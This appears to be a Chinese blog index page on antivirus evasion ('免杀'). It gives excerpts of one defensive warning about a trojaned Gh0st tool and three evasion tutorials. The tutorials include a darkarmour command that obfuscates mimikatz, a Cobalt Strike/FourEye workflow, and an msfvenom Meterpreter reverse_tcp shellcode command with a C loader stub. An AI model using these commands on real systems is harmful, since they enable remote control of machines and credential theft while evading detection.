免杀
sash1mi
这个作者很懒,什么都没留下…
展开
-
警惕免杀版Gh0st木马!
经过调查发现,这款开源的高度免杀版Gh0st木马目前正在大范围传播,据称可免杀多种主流杀软:开发者不仅制作了新颖的下载页面,还设法增加了搜索引擎的收录权重,吸引了许多免杀马爱好者的下载使用!加强软件下载的安全管理:我们需要加强对开源工具安全的管理和控制,例如在下载前注意审查该开源工具的源码、检查其依赖项、建立安全审查和评估机制等,以减少投毒事件的风险。断开与攻击源的连接:立即断开与该工具的连接,以防止攻击者继续操纵和控制终端;然后需要立即删除相关文件并清理系统。排查安装有该后门软件的主机,及时清理。原创 2023-05-04 11:03:05 · 1290 阅读 · 0 评论 -
darkarmour免杀mimikatz
darkarmour免杀mimikatzdarkarmour项目地址:https://github.com/bats3c/darkarmourdarkarmour是一个可用来免杀exe的项目,使用darkarmour来免杀mimikatzUsage:./darkarmour.py -f mimikatz.exe -j -l 5 -e xor -o darkmeter.exe-f:文件加密,如果没有另行说明,则假定为二进制文件-j:使用基于jmp的pe加载器-e:加密算法(异或)-l:加原创 2021-07-02 11:34:30 · 560 阅读 · 2 评论 -
免杀过火绒
免杀过火绒接上篇文章《免杀过360全家桶》https://blog.csdn.net/weixin_46676743/article/details/1133505001.cs建立监听2.生成payload3.将生成的payload放到kali里编译4.FourEye编译项目地址与具体使用方法:https://github.com/lengjibo/FourEye注意:一定要按照此工具的编译规则install gcc!!5.火绒查杀360查杀6.cs上线.原创 2021-02-04 17:34:42 · 2292 阅读 · 9 评论 -
免杀过360全家桶
免杀过360全家桶1.kali生成一串shellcodemsfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 6 LHOST=kali的ip地址 LPORT=随便写个端口号(8888、9999都阔以) -f c2.VS编写免杀程序这里给出代码#include <windows.h>#include <stdio.h>(这里是我生成的shellcode)unsigned char原创 2021-01-28 17:19:14 · 3868 阅读 · 5 评论